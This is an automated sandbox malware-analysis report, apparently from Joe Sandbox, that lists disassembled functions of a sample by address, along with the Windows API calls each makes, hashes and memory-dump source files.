                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f67e162f4252bcea318c559fa87a169198402d496e09e42201540da2e0458a6c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 917dc5f49af6c943b09216448ce886b7f93901cdd67708fe0ef4eefc5865726e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f67e162f4252bcea318c559fa87a169198402d496e09e42201540da2e0458a6c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84514AB5A00219EFCB14CF58C894AAABBF8FF8D314B058559E945DB314E734E911CBA0
                                                                                                                                                                                                                                                                                                        Function 01029540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 010295F3
                                                                                                                                                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0102961F
                                                                                                                                                                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 01029677
                                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0102969C
                                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 010296A4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b1397b96587e93ea5d95ee6bfaab75d1ea423c7a220140ea02ac8d6ef50cf36b
                                                                                                                                                                                                                                                                                                        • Instruction ID: a58d4350211684e8c420267c807fc044806c55a3487c844bd6e776008b5ffa7a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1397b96587e93ea5d95ee6bfaab75d1ea423c7a220140ea02ac8d6ef50cf36b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7514E75A002259FDB11DF55C985AA9BBF5FF48314F088098E849AB362CB35ED41DF90
                                                                                                                                                                                                                                                                                                        Function 01039941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0103999D
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 01039A2D
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 01039A49
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 01039A8F
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 01039AAF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,01021A02,?,7644E610), ref: 00FCF9F1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,01010354,00000000,00000000,?,?,01021A02,?,7644E610,?,01010354), ref: 00FCFA18
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7e5087f3f83e01dd87fc125d8f1106f39b8c0a80f6486e3c0b5454cdc48aa3ce
                                                                                                                                                                                                                                                                                                        • Instruction ID: b78f62919a279466336cd4f50dfa2e003dca0490f362068239494d8734387e1c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e5087f3f83e01dd87fc125d8f1106f39b8c0a80f6486e3c0b5454cdc48aa3ce
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4516B35A00606DFCB11DF69C48099DBBF4FF49318B048199E84A9B722D775ED86CF90
                                                                                                                                                                                                                                                                                                        Function 010475AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0104766B
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 01047682
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 010476AB
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0102B5BE,00000000,00000000), ref: 010476D0
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 010476FF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7451e4d139c6bb623edd010eae0b919635cd377e9f16cd18fde4b513213297c2
                                                                                                                                                                                                                                                                                                        • Instruction ID: aaea23904bfdf8135d0542ee41e58f6dc5164da6e7d9a1a799deb45c10ba02a1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7451e4d139c6bb623edd010eae0b919635cd377e9f16cd18fde4b513213297c2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B041CFB5A00104AFE765DF6CC9C8FA97FA6FB0D350F0502B4E999A72D1D375A901CB90
                                                                                                                                                                                                                                                                                                        Function 00FE23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b22375818bb0763229cbf2b71ab93985eee71b3db93ee24f85c365bbde21a245
                                                                                                                                                                                                                                                                                                        • Instruction ID: bcce2d2b0bb88d633b02d05ee7925bb31572987fdd4d84193345f3d92d9f56dc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b22375818bb0763229cbf2b71ab93985eee71b3db93ee24f85c365bbde21a245
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F41D632E002049FDB24DF79C881A5DB3E9EF88324F154569E515EB396EB35ED01EB80
                                                                                                                                                                                                                                                                                                        Function 00FB19CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00FB19E1
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00FB19FE
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00FB1A23
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00FB1A3D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4c05867b9516131cf52a538d20db20171fa64059bc8fd8b22e75168590570f9d
                                                                                                                                                                                                                                                                                                        • Instruction ID: bbfb86171afaf47c1e8a26ccf7ee0f8f1cf9f824fc48c125a3ee0d239cf790af
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c05867b9516131cf52a538d20db20171fa64059bc8fd8b22e75168590570f9d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A41AE71A0410AFFDF159F64C894BFEB774FF05324F20821AE469A22A0C7346A54EF51
                                                                                                                                                                                                                                                                                                        Function 010242B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetInputState.USER32 ref: 01024310
                                                                                                                                                                                                                                                                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 01024367
                                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 01024390
                                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0102439A
                                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010243AB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1112c079639238c13b43e8966d7c33dd453ed5de85a9dbbff2d14f8f934066ce
                                                                                                                                                                                                                                                                                                        • Instruction ID: 42d6fad92e9f3d854c5b9958c7baa94dce10f7b06ddb3e6c509ab3e660834a01
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1112c079639238c13b43e8966d7c33dd453ed5de85a9dbbff2d14f8f934066ce
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8731FA70908352EFFB79DB78D448BBA7BE8AB01304F048599D5E2C2195E7B99045CF21
                                                                                                                                                                                                                                                                                                        Function 0101224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 01012262
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 0101230E
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 01012316
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 01012327
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0101232F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 694ac9e779951768fb0253b79422d4e92bff13c84c1c2602dc4f1ad136bde806
                                                                                                                                                                                                                                                                                                        • Instruction ID: f5919b25d8296c178b903e3cabe364165022a626a8af3dbf8b7f7f640b1ac75b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 694ac9e779951768fb0253b79422d4e92bff13c84c1c2602dc4f1ad136bde806
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8231F1B2900219EFDB14CFACC988ADE3BB5EB04315F104269FA65A72D5C374A940CB90
                                                                                                                                                                                                                                                                                                        Function 010461A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 010461E4
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0104623C
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0104624E
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01046259
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 010462B5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a7766ecd910fe1d9406f526434458efd79a5da751f85edd617aea59a1ecf56fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 45bd8da7065f391790ba678b4dbeb1543584cb8c73f846e6d4f618ade9205ddb
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7766ecd910fe1d9406f526434458efd79a5da751f85edd617aea59a1ecf56fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9021D5B5900208ABDB20DF94CCC4AEE7BB8FF05710F004266FA64EB180E7759581CF51
                                                                                                                                                                                                                                                                                                        Function 0103138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 010313AE
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 010313C5
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 01031401
                                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 0103140D
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 01031445
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 078d537e8baa5d8d91e464576231802cd3ae2d45ed85e8cb2e53a1c727610cc6
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3bc69c371c99790607049e4092c5175047141103e30043a4b9c53e3992536a77
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 078d537e8baa5d8d91e464576231802cd3ae2d45ed85e8cb2e53a1c727610cc6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7621907A600214AFD714EFA5C984A9EBBF9EF98340B048469E88AD7751CA75EC00DF90
                                                                                                                                                                                                                                                                                                        Function 00FED13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00FED146
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FED169
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FD6A79,?,0000015D,?,?,?,?,00FD85B0,000000FF,00000000,?,?), ref: 00FE3BC5
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FED18F
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FED1A2
                                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FED1B1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 240bffc8598817531d144c5e313afb174dc46407447254aab696c93d2bfb5d0c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0ed844451dbf48dd757891f507597e59ef38dd224f2602a5e46ef3990413fc70
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 240bffc8598817531d144c5e313afb174dc46407447254aab696c93d2bfb5d0c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A001D876A026957F333126B75C8CD7B7A6DDFC2B71314012AFD04C2244DA698C01A2B0
                                                                                                                                                                                                                                                                                                        Function 01016078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _memcmp
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2931989736-0
